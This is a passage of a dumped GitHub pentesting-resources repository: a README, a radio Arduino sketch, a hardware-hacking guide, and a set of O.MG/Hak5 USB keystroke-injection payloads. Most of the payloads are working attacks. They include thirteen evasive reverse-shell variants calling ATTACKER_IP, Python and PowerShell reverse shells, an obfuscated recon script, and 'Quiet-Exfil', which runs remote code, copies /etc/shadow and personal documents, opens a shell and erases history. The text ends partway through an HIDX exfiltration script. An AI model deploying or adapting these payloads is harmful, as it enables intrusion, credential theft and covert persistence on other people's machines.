├── LICENSE ├── README.md ├── hardware ├── Bins │ └── HB0096_TwoMeter_Demo_Mod.ino ├── Electronic-Cats │ └── readme.md ├── Hak5-oMG │ ├── omg │ │ ├── Linux │ │ │ ├── Evasive-RevShell │ │ │ │ └── payload.txt │ │ │ ├── Obfuscated-Network-Recon │ │ │ │ └── payload.txt │ │ │ ├── Python-Reverse-Shell │ │ │ │ └── payload.txt │ │ │ ├── Quiet-Exfil │ │ │ │ └── payload.txt │ │ │ └── Setup-New-HIDX-Target-Client │ │ │ │ └── payload.txt │ │ ├── Windows │ │ │ ├── HelloWithLocation │ │ │ │ └── payload.txt │ │ │ ├── PS-Reverse-Shell │ │ │ │ └── payload.txt │ │ │ ├── SetupHIDX-TCP-EXFIL │ │ │ │ └── payload.txt │ │ │ └── SetupHIDXAirGapShell │ │ │ │ └── payload.txt │ │ ├── iOS │ │ │ └── OpenSafariLink │ │ │ │ └── payload.txt │ │ └── macOS │ │ │ ├── Locate-and-Alert-User │ │ │ └── badHello.txt │ │ │ ├── Python-Reverse-Shell │ │ │ └── payload.txt │ │ │ ├── Quiet-Shell │ │ │ └── payload.txt │ │ │ └── SetupHIDXTargetShell │ │ │ └── payload.txt │ ├── readme.md │ ├── rubberducky │ │ └── placeholder.md │ ├── sharkjack │ │ ├── LAMPooned │ │ │ └── payload.txt │ │ ├── byon-nmap.sh │ │ └── sneaky-beacon │ │ │ └── payload.txt │ └── utils │ │ └── iOS-URL-Map.md ├── Reversing │ └── macOS-tools-workflow.md └── Upgrades-Mods │ ├── Jhewitt5gmod.md │ ├── PimpMyNethunter.md │ └── ppkb_kali_nethunter_pinephone_install.md ├── repos ├── BurpPlugins.md └── repos-main.md ├── resources ├── Command-Line │ ├── grep.md │ └── pbCopy-Paste.md ├── OSINT │ ├── Dehashed-Cheatsheet.md │ ├── GuideLinks.md │ └── dorks │ │ ├── GitDorks.md │ │ ├── GoogleDorks.md │ │ ├── Readme.md │ │ ├── boxpiper.txt │ │ ├── disclosurePrograms.md │ │ ├── vsec7-list.txt │ │ └── webcam-otw.txt ├── SDR │ ├── Frequency-Ranges.md │ ├── WHAD-Command.md │ └── airspy-flightview.sh ├── methodology │ ├── API-Methodology.md │ ├── ExternalPentest.md │ ├── PhysicalPentest.md │ ├── PhysicalSecurityChecklist.md │ └── WebPentest.md ├── networking │ ├── Subnet-Guide.xlsx │ ├── Wireshark-Filters.md │ ├── attacks │ │ └── WiFi-Tool-Commands.md │ └── detection │ │ ├── Readme.md │ │ └── mirai.lua ├── payload-cheatsheets │ ├── XSS-cheatsheet.md │ ├── impacket-cheatsheet.md │ ├── msfvenom-cheatsheet.md │ ├── reverse-shells.md │ ├── veil-venom-shells.sh │ └── xss-strings.md ├── readme.md └── reporting │ ├── External-Pentest-Report.md │ ├── external_test_template.md │ └── img │ ├── readme.md │ └── rootdown_logo.png └── scripts ├── automation ├── AppendToNotion.sh ├── AutoSubdominer.sh ├── CyberRecon.sh ├── DomainWatchdog.sh ├── SubsToNotion.py ├── SubsToSQL.py └── TrendyWordlister.py ├── exfil └── lil-doc-snatcher.sh ├── exploits ├── buffer_jump.py ├── python-injection-example.sh └── veil-venom-shells.sh ├── foothold-to-escalation ├── Readme.md ├── escalateMyTools.py ├── traverserHunt.py └── winTools.sh ├── recon ├── OneLinerCollection.md ├── ipsweep.sh ├── maxrecon.sh ├── nmap-dir-vuln.txt ├── oneLineSubs.md ├── port-report.py ├── portscanner.py ├── smb-scan.sh ├── subrecon.sh ├── system-filescan.sh ├── theEnumerator.sh ├── tool-heavy.sh └── windows_cred_hunter.ps1 ├── security ├── detection │ ├── linux_mal_scanner.sh │ └── macos_malscan.sh └── hardening │ ├── LinuxSecure.sh │ ├── LinuxServerSecure.sh │ ├── MacSecure.sh │ └── WinSecure.bat └── utilities ├── CleanDir.py ├── DomainExtractor.py └── passwords ├── Readme.md ├── passgen.sh └── word_sentry.py /README.md: -------------------------------------------------------------------------------- 1 | ## `RDSec` 2 | `Made for red, purple and blue.` 3 | 4 | 5 | - [**Tools**](https://github.com/Root-Down-Digital/pentesting-resources/blob/main/repos/repos-main.md) • Browse a collection of tools curated for specific tasks from recon to post-op. 6 | 7 | - [**Scripts**](https://github.com/Root-Down-Digital/pentesting-resources/tree/main/scripts) • Automate monitoring, secure servers, find vulns & escalate privileges. 8 | 9 | - [**Resources**](https://github.com/Root-Down-Digital/pentesting-resources/tree/main/resources) • Quick reference lists for OSINT, mobile & web and hardware hacking. *Methodology in the works.* 10 | 11 | - [**Hardware**](https://github.com/Root-Down-Digital/pentesting-resources/tree/main/hardware) • Hak5 & O.MG device payload templates. Other gadgets, SDR & reversing coming soon (Catsniffer, Magspoof…) 12 | 13 | --- 14 | > [!IMPORTANT] 15 | > The material in this repository, including all associated links and content, is provided solely for informational and educational purposes. The authors do not endorse or condone any illegal activity. Use this information responsibly and at your own risk. 16 | 17 | > _Huge thanks to every author of these sources. Feel free to contribute or suggest improvements! We believe in the power of community and collaboration. Every single contribution, however small, is valued and appreciated._ 18 | 19 | 20 | -------------------------------------------------------------------------------- /hardware/Bins/HB0096_TwoMeter_Demo_Mod.ino: -------------------------------------------------------------------------------- 1 | //============================================================================== 2 | // SA818-VHF Radio Demo from HackerBox 0096 - "Two Meter" - Modded with some various VHF frequencies. Ensure compliance and licensing before use. 3 | 4 | // https://hackerboxes.com/products/hackerbox-0096-two-meter 5 | // 6 | // Radio channels are specified in two arrays 7 | // (one for frequency and one for a text nickname) 8 | // Button A cycles through channels which are received to the LINE OUT port 9 | // Button C is Push to Talk (transmit) - Do not use this feature without 10 | // proper licensure and while making required call sign indentification 11 | // 12 | // This code was adapted from an SA818-U demo written by IMSAI Guy: 13 | // https://youtu.be/73b-Q6AwoNA 14 | //============================================================================== 15 | 16 | #include 17 | #include 18 | TFT_eSPI tft = TFT_eSPI(); 19 | 20 | #define SA818_AudioOn 17 21 | #define SA818_AF_OUT 38 //Analog input to MCU 22 | #define SA818_PTT 13 23 | #define SA818_PD 27 24 | #define SA818_HL 33 25 | #define SA818_RXD 21 26 | #define SA818_TXD 22 27 | #define SA818_AF_IN 25 //Analog output from MCU 28 | #define Button_A 15 29 | #define Button_B 26 30 | #define Button_C 32 31 | 32 | // All NOAA Weather Radio stations broadcast on one of seven frequencies in the VHF Public Service band: 33 | // 162.400 MHz, 162.425 MHz, 162.450 MHz, 162.475 MHz, 162.500 MHz, 162.525 MHz, and 162.550 MHz. 34 | // https://www.weather.gov/phi/nwrfaq 35 | 36 | // Number of channels 37 | #define Channel_count 13 // Adjusted as per new channels 38 | 39 | // Frequency array 40 | double Frequency[Channel_count] = { 41 | 146.2500, 162.4000, 162.4250, 162.4500, 162.4750, 162.5000, 162.5250, 162.5500, 42 | 25.0000, 512.0000, 823.9875, 868.9875, 1300.0000 43 | }; 44 | 45 | // Channel names 46 | char *Channel_name[] = { 47 | "2m Test", "NOAA 1", "NOAA 2", "NOAA 3", "NOAA 4", "NOAA 5", "NOAA 6", "NOAA 7", 48 | "Custom 1", "Custom 2", "Custom 3", "Custom 4", "Custom 5" 49 | }; 50 | 51 | int Channel = 0; // current channel 52 | 53 | void setup(void) { 54 | Serial2.begin(9600, SERIAL_8N1, SA818_TXD, SA818_RXD); 55 | 56 | pinMode(Button_A, INPUT_PULLDOWN); 57 | pinMode(Button_B, INPUT_PULLDOWN); 58 | pinMode(Button_C, INPUT_PULLDOWN); 59 | 60 | pinMode(SA818_AudioOn, INPUT); //SA818 drives pin LOW to tell MCU that a signal is being received 61 | 62 | // SA818_AF_IN is an output from the MCU, but we set it as an INPUT when not in use 63 | pinMode(SA818_AF_IN, INPUT); 64 | 65 | //Output Power High/Low 66 | // High Power: Float (MCU=input) 67 | // Low Power: Drive pin LOW 68 | // INPORTANT NOTE: NEVER Drive the pin HIGH (undefined state) 69 | pinMode(SA818_HL, OUTPUT); 70 | digitalWrite(SA818_HL, LOW); 71 | 72 | pinMode(SA818_PTT, OUTPUT); //Push to Talk (Transmit) 73 | digitalWrite(SA818_PTT, HIGH); //(0=TX, 1=RX) DO NOT Transmit Without License 74 | 75 | pinMode(SA818_PD, OUTPUT); 76 | digitalWrite(SA818_PD, HIGH); //Release Powerdown (1=Radio ON) 77 | 78 | tft.init(); 79 | tft.setRotation(3); 80 | 81 | tft.fillScreen(TFT_BLACK); 82 | tft.drawRect(0, 0, tft.width(), tft.height(), TFT_WHITE); 83 | tft.setTextColor(TFT_RED); 84 | tft.setCursor(0, 40, 4); 85 | tft.println(" SA818-VHF Demo"); 86 | delay(3000); 87 | 88 | tft.fillScreen(TFT_BLACK); 89 | tft.setTextColor(TFT_YELLOW,TFT_BLACK); 90 | tft.setCursor(0, 0, 4); 91 | tft.println("Radio Connect:"); 92 | Serial2.println("AT+DMOCONNECT\r"); // connect communications with SA818 93 | tft.print(Serial2.readString()); // returns :0 if good 94 | tft.println("Radio Version:"); 95 | Serial2.print("AT+VERSION\r\n"); // get version 96 | tft.print(Serial2.readString()); // returns: version number 97 | delay(2000); 98 | 99 | tft.fillScreen(TFT_BLACK); 100 | tft.setCursor(0, 0, 4); 101 | tft.println("Set Group:"); // group set 102 | setfreq(); // set frequency 103 | tft.print(Serial2.readString()); // returns :0 if good 104 | 105 | tft.println("Set Volume: "); 106 | Serial2.print("AT+DMOSETVOLUME=8\r\n"); // set volume 107 | tft.print(Serial2.readString()); // returns :0 if good 108 | delay(2000); 109 | 110 | tft.fillScreen(TFT_BLACK); 111 | disp_channel(); 112 | } 113 | 114 | void loop() { 115 | if (digitalRead(Button_A)){ 116 | Channel += 1; // next channel 117 | if (Channel >= Channel_count) Channel=0; 118 | setfreq(); 119 | tft.fillScreen(TFT_BLACK); 120 | disp_channel(); 121 | delay(300); // debounce switch 122 | } 123 | 124 | if (digitalRead(Button_C)){ 125 | tft.fillScreen(TFT_RED); // RED Screen when transmitting 126 | disp_channel(); 127 | digitalWrite(SA818_PTT,LOW); // assert push to talk 128 | delay(300); // debounce switch 129 | while(digitalRead(Button_C)); 130 | digitalWrite(SA818_PTT,HIGH); // release push to talk 131 | tft.fillScreen(TFT_BLACK); // BLACK Screen when not transmitting 132 | disp_channel(); 133 | delay(1000); // wait for transmisson to end 134 | } 135 | } 136 | 137 | void setfreq() { 138 | Serial2.print("AT+DMOSETGROUP=0,"); 139 | Serial2.print(String(Frequency[Channel],4)); 140 | Serial2.print(","); 141 | Serial2.print(String(Frequency[Channel],4)); 142 | Serial2.print(",0000,1,0000\r\n"); 143 | } 144 | 145 | void disp_channel() { 146 | tft.setCursor(0, 0, 4); 147 | tft.setTextColor(TFT_BLUE,TFT_BLACK); 148 | tft.println("SA818-VHF Demo"); 149 | tft.setTextColor(TFT_YELLOW,TFT_BLACK); 150 | tft.print("Freq: "); 151 | tft.println(String(Frequency[Channel],4)); 152 | tft.print("Name: "); 153 | tft.println(Channel_name[Channel]); 154 | } 155 | -------------------------------------------------------------------------------- /hardware/Electronic-Cats/readme.md: -------------------------------------------------------------------------------- 1 | # Electronic Cats Hardware Guide 2 | 3 | ## CatSniffer 4 | 5 | ### [CatSniffer](https://github.com/ElectronicCats/CatSniffer/tree/master): Official repo 6 | 7 | **[Firmware](https://github.com/ElectronicCats/CatSniffer-Firmware)** 8 | 9 | | **Firmware Name** | **Supported Protocol** | **Description** | **Type of Devices** | **Frequency Range** | 10 | | --- | --- | --- | --- | --- | 11 | | **`SerialPassthroughwithboot`** | N/A | Enables serial communication between RP2040 and CC1352P7. | N/A | N/A | 12 | | **`catSniffer_LoRa`** | LoRa (SX1262) | Sniffs LoRa communications. | LoRa IoT devices | 863-870 MHz (EU), 902-928 MHz (US) | 13 | | **`Sniffle_CC1352P_7`** | Bluetooth Low Energy (BLE) | Sniffs BLE communication. | BLE IoT devices | 2.4-2.4835 GHz | 14 | | **`airtag_scanner_CC1352P_7`** | Bluetooth Low Energy (BLE) | Scans for Apple AirTag communications. | Apple AirTags | 2.4-2.4835 GHz | 15 | | **`airtag_spoofer_CC1352P_7`** | Bluetooth Low Energy (BLE) | Spoofs Apple AirTag communications. | Apple AirTags | 2.4-2.4835 GHz | 16 | | **`sniffer_fw_cc1252P_7`** | Sub 1 GHz, 2.4 GHz | Sniffs proprietary sub-GHz and 2.4 GHz communications. | IoT devices using Sub 1 GHz or 2.4 GHz | 315-928 MHz, 2.4-2.4835 GHz | 17 | 18 | **[Software](https://github.com/ElectronicCats/CatSniffer-Tools)** 19 | 20 | - `catnip_uploader`: Download and flash the latest releases using a python script 21 | - `cc2538-bsl`: Cross-platform script to upload firmware (.hex) to the CatSniffer 22 | - `pycatsniffer_bv3`: Cross-platform script for packet sniffing BLE, IEEE 802.15 & Zigbee 23 | 24 | > [!WARNING] 25 | > It is easy to brick the v1 and x2x by uploading the wrong chip FW. Examine the physically to determine `cc1352p1lp` or `cc1352r1lp`. Failure results in a state recoverable by JTAG only (v3x can be restored without additional hardware). 26 | 27 | ## MagSpoof 28 | ### [MagSpoof](https://github.com/ElectronicCats/magspoof): Official Repo 29 | 30 | #### 1. Functionality 31 | a. Read/save card programmatically 32 | b. Emulate strip via EMP 33 | c. Read > Save > Emulate OTG 34 | 35 | #### 2. PoC Features 36 | - [AMEX chip bypass & PIN prediction](https://github.com/vaginessa/chip-n-pin-magspoof) Can disable Chip-and-PIN. Correctly predicts Amex credit card numbers + expirations from previous card number 37 | - New Findings 38 | 39 | > [!IMPORTANT] 40 | > All new findings subject to responsible disclosure and other ethical and legal obligations. Anything here is common knowledge. 41 | -------------------------------------------------------------------------------- /hardware/Hak5-oMG/omg/Linux/Evasive-RevShell/payload.txt: -------------------------------------------------------------------------------- 1 | REM Pick ONE of the methods below 2 | REM Opening/closing a terminal window for the command can be found in other payloads, adjust delay as needed 3 | 4 | REM To disable the spawned shells: 5 | REM 1. If using process masquerading with a custom name: pkill -f legitimate_process_name 6 | REM 2. For all other reverse shells: pkill -f 'bash -i' 7 | 8 | REM 1. Process Masquerading: This method renames the reverse shell process to a more legitimate name to avoid suspicion. 9 | REM STRING bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1 & disown; exec -a legitimate_process_name bash' 10 | REM ENTER 11 | 12 | REM 2. Using Legitimate Tools for Execution: Utilizes the "nohup" command to run the reverse shell in the background, even after the terminal closes, reducing detectability. 13 | REM STRING nohup /bin/bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1 & disown 14 | REM ENTER 15 | 16 | REM 3. Disabling Logging: Temporarily redirects standard output and error streams to /dev/null, ensuring no logs are written during the execution of the reverse shell. 17 | REM STRING exec 3>&1 4>&2; exec 1>/dev/null 2>/dev/null; bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1 & disown; exec 1>&3 2>&4 18 | REM ENTER 19 | 20 | REM 4. Stealth Mode Execution: Uses "nohup" and "disown" to execute the reverse shell with minimal visibility in the terminal, making the process less noticeable. 21 | REM STRING bash -c 'nohup bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1 & disown' 22 | REM ENTER 23 | 24 | REM 5. Fork Bomb Prevention: Ensures that only a limited number of bash processes are running to prevent overwhelming the system, then executes the reverse shell. 25 | REM STRING bash -c '[[ $(pgrep bash | wc -l) -lt 5 ]] && bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1 & disown' 26 | REM ENTER 27 | 28 | REM 6. User Interaction Detection: Checks if the system is idle (no active sessions) before executing the reverse shell, reducing the chance of immediate detection by a user. 29 | REM STRING bash -c 'if [[ -z $(who -T | grep "+" | awk "{print $6}") ]]; then bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1 & disown; fi' 30 | REM ENTER 31 | 32 | REM 7. Network Evasion: Executes the reverse shell by downloading and running a script from a remote server, masking it as a legitimate network request. 33 | REM STRING bash -c 'curl http://ATTACKER_IP:PORT/shell.sh | bash & disown' 34 | REM ENTER 35 | 36 | REM 8. Memory-resident Execution: Encodes the reverse shell command into a base64 string, decodes, and executes it directly from memory, avoiding disk I/O to reduce detection. 37 | REM STRING echo 'bash -c "exec -a legitimate_process_name nohup bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1"' | base64 | base64 -d | bash & disown 38 | REM ENTER 39 | 40 | REM 9. Named Pipe (FIFO) Execution: Uses a named pipe (FIFO) for executing the reverse shell, which can help in bypassing traditional process monitoring mechanisms. 41 | REM STRING mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc ATTACKER_IP PORT > /tmp/f & disown 42 | REM ENTER 43 | 44 | REM 10. Steganography-based Execution: Hides the reverse shell payload within an image file using steganography. The script extracts and executes the payload from the image. Follow the two setup commands to build the payload image. 45 | REM Step 1: Create the reverse shell payload. 46 | REM echo 'bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1' > payload.sh 47 | REM Step 2: Embed the payload into an image using steghide. 48 | REM steghide embed -cf original_image.png -ef payload.sh -sf payload.png -p "password" 49 | REM Step 3: Host the payload.png on a web server for remote execution and run the payload 50 | REM STRING wget http://ATTACKER_IP/payload.png -O /tmp/payload.png; steghide extract -sf /tmp/payload.png -xf /tmp/payload.sh -p "password"; bash /tmp/payload.sh & disown 51 | REM ENTER 52 | 53 | REM 11. Environmental Variable Hijacking: Modifies the PATH environment variable to include the reverse shell command, which is executed whenever a command is run in the shell. 54 | REM STRING export PATH=$(echo $PATH | sed 's/:/;bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1 & disown;/') 55 | REM ENTER 56 | 57 | REM 12. Signal-based Trigger: Sets a trap to execute the reverse shell only when a specific signal (e.g., HUP) is received, delaying execution until the signal is triggered. 58 | REM STRING trap 'bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1 & disown' HUP; kill -HUP $$ 59 | REM ENTER 60 | 61 | REM 13. Dynamic Linker Hijacking: Uses the LD_PRELOAD environment variable to inject a shared object that contains the reverse shell payload, executing it before any other command. 62 | REM STRING LD_PRELOAD=/tmp/payload.so bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1 & disown 63 | REM ENTER 64 | -------------------------------------------------------------------------------- /hardware/Hak5-oMG/omg/Linux/Obfuscated-Network-Recon/payload.txt: -------------------------------------------------------------------------------- 1 | DELAY 500 2 | REM Description: Pentest payload with obfuscation for gathering network intelligence and resources 3 | 4 | REM Open Terminal 5 | GUI SPACE 6 | DELAY 500 7 | STRING Terminal 8 | ENTER 9 | DELAY 500 10 | 11 | REM Create directory for output on USB 12 | STRING mkdir -p /root/loot/network_intel 13 | ENTER 14 | DELAY 500 15 | 16 | REM Check if the directory was created 17 | STRING eval $(echo aWYgWyAhIC1kICIvbWVkaWEvdXNiL2xvb3QvbmV0d29ya19pbnRlbCIgXTsgdGhlbiBlY2hvICJGYWlsZWQgdG8gY3JlYXRlIGRpcmVjdG9yeS4iICYmIGV4aXQgMTsgZmk= | base64 --decode) 18 | ENTER 19 | DELAY 500 20 | 21 | REM Gather network interfaces configuration 22 | STRING eval $(echo aWZjb25maWcgPiAvbWVkaWEvdXNiL2xvb3QvbmV0d29ya19pbnRlbC9pZmNvbmZpZy50eHQ= | base64 --decode) 23 | ENTER 24 | DELAY 500 25 | 26 | REM List all active listening ports and their programs 27 | STRING eval $(echo bmV0c3RhdCAtdHVsbgo= | base64 --decode) > /media/usb/loot/network_intel/netstat.txt 28 | ENTER 29 | DELAY 500 30 | 31 | REM List all running processes 32 | STRING eval $(echo cHMgYXV4Cg== | base64 --decode) > /media/usb/loot/network_intel/processes.txt 33 | ENTER 34 | DELAY 500 35 | 36 | REM List all SMB shares 37 | STRING eval $(echo c21iY2xpZW50IC1MIGxvY2FsaG9zdCAtTgo= | base64 --decode) > /media/usb/loot/network_intel/smb_shares.txt 38 | ENTER 39 | DELAY 500 40 | 41 | REM List all printers 42 | STRING eval $(echo bHBzdGF0IC1hCg== | base64 --decode) > /media/usb/loot/network_intel/printers.txt 43 | ENTER 44 | DELAY 500 45 | 46 | REM Perform a ping scan in the local network to discover active hosts 47 | STRING eval $(echo bm1hcCAtc1AgMTkyLjE2OC4xLjAvMjQK | base64 --decode) > /media/usb/loot/network_intel/nmap.txt 48 | ENTER 49 | DELAY 500 50 | 51 | REM List all network connections 52 | STRING eval $(echo bHNvZiAtaQo= | base64 --decode) > /media/usb/loot/network_intel/connections.txt 53 | ENTER 54 | DELAY 500 55 | 56 | REM Display the ARP table 57 | STRING eval $(echo YXJwIC1hCg== | base64 --decode) > /media/usb/loot/network_intel/arp.txt 58 | ENTER 59 | DELAY 500 60 | 61 | REM Exit the terminal 62 | STRING exit 63 | ENTER 64 | -------------------------------------------------------------------------------- /hardware/Hak5-oMG/omg/Linux/Python-Reverse-Shell/payload.txt: -------------------------------------------------------------------------------- 1 | DELAY 1000 2 | GUI 3 | SPACE 4 | STRING Terminal 5 | ENTER 6 | DELAY 3000 7 | STRING python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ATTACKER_IP",PORT));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);' 8 | ENTER 9 | GUI h -------------------------------------------------------------------------------- /hardware/Hak5-oMG/omg/Linux/Quiet-Exfil/payload.txt: -------------------------------------------------------------------------------- 1 | DELAY 500 2 | REM Description: This script downloads a remote script, performs data exfiltration, sets up a reverse shell, and cleans its traces, demonstrating a comprehensive USB keystroke injection penetration test. 3 | 4 | REM Open Terminal 5 | GUI SPACE 6 | DELAY 500 7 | STRING Terminal 8 | ENTER 9 | DELAY 500 10 | 11 | REM Download and run a script from a remote server 12 | STRING curl http://your-server.com/script.sh | sh 13 | ENTER 14 | DELAY 1000 15 | 16 | REM Create directories 17 | STRING mkdir -p /exfilit/files 18 | ENTER 19 | DELAY 500 20 | 21 | REM Attempt to copy user data if read permissions are available 22 | STRING if [ -r /etc/passwd ]; then cp /etc/passwd /exfilit/files; fi 23 | ENTER 24 | STRING if [ -r /etc/shadow ]; then cp /etc/shadow /exfilit/files; fi 25 | ENTER 26 | DELAY 500 27 | 28 | REM Find and copy files under 70MB 29 | STRING find ~/Documents ~/Downloads -type f -size -70M -exec cp -n {} /exfilit/files \; 30 | ENTER 31 | 32 | REM Set up a reverse shell for persistent access 33 | STRING bash -i >& /dev/tcp/your-server.com/8080 0>&1 & 34 | ENTER 35 | 36 | REM Clean up any trace of its actions from system logs 37 | STRING history -c 38 | ENTER 39 | STRING rm ~/.bash_history 40 | ENTER 41 | 42 | REM Exit the terminal 43 | STRING exit 44 | ENTER 45 | -------------------------------------------------------------------------------- /hardware/Hak5-oMG/omg/Linux/Setup-New-HIDX-Target-Client/payload.txt: -------------------------------------------------------------------------------- 1 | STRINGLN_BLOCK 2 | screen 3 | launchstshell(){ 4 | RSHELL="/bin/dash" 5 | HIDDEV=$(dmesg|grep -i "D3C0:D34D" |grep hiddev|grep hidraw|tail -n1|sed -e "s/.*hidraw/hidraw/g" -e "s/:.*//g") 6 | if [ ! -z "$HIDDEV" ]; then 7 | echo "launching shell on /dev/$HIDDEV" 8 | $RSHELL -c "$RSHELL -i < /dev/$HIDDEV > /dev/$HIDDEV 2>&1" 9 | else 10 | echo "Unable to launch shell, no known device" 11 | fi 12 | } 13 | launchstshell 14 | CTRL a 15 | DELAY 250 16 | CTRL d 17 | END_STRINGLN -------------------------------------------------------------------------------- /hardware/Hak5-oMG/omg/Windows/HelloWithLocation/payload.txt: -------------------------------------------------------------------------------- 1 | REM For Windows and MacOS: Make the computer say a personalized fun message including geolocation 2 | DELAY 500 3 | 4 | REM Try the Windows way (this will do nothing on MacOS) 5 | GUI d 6 | DELAY 500 7 | GUI r 8 | DELAY 500 9 | STRING powershell "Add-Type -TypeDefinition 'public class Speech { public void Speak(string text) { (New-Object -ComObject SAPI.SpVoice).Speak(text); } }'; $location = Invoke-RestMethod -Uri 'http://ip-api.com/json/'; (New-Object Speech).Speak('Don\'t mind me, ' + [Environment]::UserName + ', I\'m just a talking computer in ' + $location.city + ', ' + $location.regionName + ', ' + $location.country + '.'); exit;" 10 | ENTER 11 | 12 | REM Try the MacOS way (this will do nothing on Windows) 13 | GUI SPACE 14 | DELAY 500 15 | STRING Terminal 16 | ENTER 17 | DELAY 500 18 | STRING location=$(curl -s http://ip-api.com/json/); say "Don't mind me, $(whoami), I'm just a talking computer in $(echo $location | jq -r '.city'), $(echo $location | jq -r '.regionName'), $(echo $location | jq -r '.country')."; exit; 19 | ENTER 20 | -------------------------------------------------------------------------------- /hardware/Hak5-oMG/omg/Windows/PS-Reverse-Shell/payload.txt: -------------------------------------------------------------------------------- 1 | REM Adapted from Hak5 payload 2 | REM @@ Opening the CMD 3 | GUI r 4 | DELAY 500 5 | STRING cmd.exe 6 | ENTER 7 | DELAY 500 8 | 9 | REM @@ Executing the PowerShell reverse shell 10 | STRING powershell -nop -c "$socket = new-object System.Net.Sockets.TcpClient('192.168.0.112', 8080); if($socket -eq $null){exit 1} $stream = $socket.GetStream(); $writer = new-object System.IO.StreamWriter($stream); $buffer = new-object System.Byte[] 1024; $encoding = new-object System.Text.AsciiEncoding; do{ $writer.Write('> '); $writer.Flush(); $read = $null; while($stream.DataAvailable -or ($read = $stream.Read($buffer, 0, 1024)) -eq $null){} $out = $encoding.GetString($buffer, 0, $read).Replace('`r`n','').Replace('`n',''); if(!$out.equals('exit')){ $out = $out.split(' ') $res = [string](&$out[0] $out[1..$out.length]); if($res -ne $null){ $writer.WriteLine($res)} }While (!$out.equals('exit')) $writer.close();$socket.close();" 11 | ENTER 12 | DELAY 500 13 | 14 | REM @@ Changing the color and resizing the CMD 15 | STRING color FE && mode con: cols=18 lines=1 16 | ENTER 17 | DELAY 200 18 | 19 | REM @@ Minimizing the CMD 20 | ALT SPACE 21 | STRING n 22 | ENTER -------------------------------------------------------------------------------- /hardware/Hak5-oMG/omg/Windows/SetupHIDX-TCP-EXFIL/payload.txt: -------------------------------------------------------------------------------- 1 | REM HIDX_Stealth_Link_TCP_Exfil_Airgapped 2 | REM Version 1.0 3 | REM OS: Windows 4 | REM Author: Wasabi 5 | REM Requirements: Firmware Version 3.0 minimum, Activated HIDX 6 | 7 | REM HID based exfiltration payload, executed directly in powershell. 8 | 9 | DUCKY_LANG us 10 | FUNCTION WIN_WRITEFILE() 11 | DELAY 1000 12 | GUI r 13 | DELAY 1000 14 | STRINGLN cmd 15 | DELAY 1000 16 | STRINGLN del %USERPROFILE%\#VAR1 17 | STRINGLN notepad.exe&&exit 18 | DELAY 2000 19 | END_FUNCTION 20 | 21 | FUNCTION WIN_SAVEANDSTARTCMD() 22 | DELAY 2000 23 | CTRL s 24 | DELAY 2000 25 | ALT n 26 | DELAY 2000 27 | STRING %USERPROFILE%\#VAR1 28 | DELAY 2000 29 | ENTER 30 | DELAY 1000 31 | GUI r 32 | DELAY 500 33 | END_FUNCTION 34 | 35 | DELAY 2000 36 | WIN_WRITEFILE(win-hidexfil.ps1) 37 | STRINGLN_BLOCK 38 | <# 39 | HIDXExfil.ps1 40 | Author: Ø1phor1³ (@01p8or13) 41 | Acknowledgements: spiceywasabi, rogandawes 42 | Required Dependencies: Activated HIDX on OMG Elite device 43 | #> 44 | 45 | function HIDXExfil { 46 | <# 47 | .DESCRIPTION 48 | A "low and slow" method of covert exfiltration meant to provide alternate 49 | pentesting pathways beyond using the target host’s network interfaces or 50 | mass storage. 51 | This POC will allow data exfiltration back to the O.MG’s flash storage or 52 | act as a proxy between the target host and another device, via the O.MG 53 | Device's built-in WiFi interface, which can allow you to receive data via listeners 54 | like nc, netcat, or similar tools. 55 | This is a POC 56 | 57 | .PARAMETER Message 58 | Message which gets exfiltrated. 59 | 60 | .PARAMETER VendorID 61 | Defining vendor ID of the device. (Default: D3C0) 62 | 63 | .PARAMETER ProductID 64 | Defining product ID of the device. (Default: D34D) 65 | 66 | .EXAMPLE 67 | Defining a message: 68 | HIDXExfil -Message "hello world" 69 | 70 | .EXAMPLE 71 | HIDX usage with every parameter: 72 | HIDXExfil -VendorID D3C0 -ProductID D34D -Message "test" 73 | 74 | .EXAMPLE 75 | Piping output into HIDX: 76 | whoami | HIDXExfil 77 | 78 | .EXAMPLE 79 | Exfiltrating systeminfo with proper formatting: 80 | systeminfo | Out-String | HIDXExfil 81 | 82 | .LINK 83 | https://github.com/0iphor13 84 | https://github.com/spiceywasabi 85 | https://github.com/rogandawes 86 | 87 | #Credits to Rogan for the idea of filehandle and device identification 88 | X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H* amsiscanbuffer 89 | #> 90 | 91 | [cmdletbinding()] 92 | param( 93 | [Parameter( 94 | Mandatory = $true, 95 | ValueFromPipeline = $true)] 96 | $Message, 97 | 98 | [Parameter(Position = 1)] 99 | [ValidateNotNullOrEmpty()] 100 | [String] 101 | $VendorID = "D3C0", #Default value 102 | 103 | [Parameter(Position = 2)] 104 | [ValidateNotNullOrEmpty()] 105 | [String] 106 | $ProductID = "D34D" # Default value 107 | ) 108 | 109 | $omg = $VendorID + "&PID_" + $ProductID 110 | function Get-OMGDevice(){ 111 | #Identify OMG device 112 | $devs = gwmi Win32_USBControllerDevice 113 | $devicestring=$null 114 | foreach ($dev in $devs) { 115 | $wmidev = [wmi]$dev.Dependent 116 | if ($wmidev.GetPropertyValue('DeviceID') -match ($omg) -and ($null -eq $wmidev.GetPropertyValue('Service'))) { 117 | $devicestring = ([char]92+[char]92+'?'+[char]92 + $wmidev.GetPropertyValue('DeviceID').ToString().Replace([char]92,[char]35) + [char]35+'{4d1e55b2-f16f-11cf-88cb-001111000030}') 118 | } 119 | } 120 | 121 | return $devicestring 122 | } 123 | 124 | function Send-Message { 125 | param( 126 | $fileHandle, 127 | $payload 128 | ) 129 | 130 | 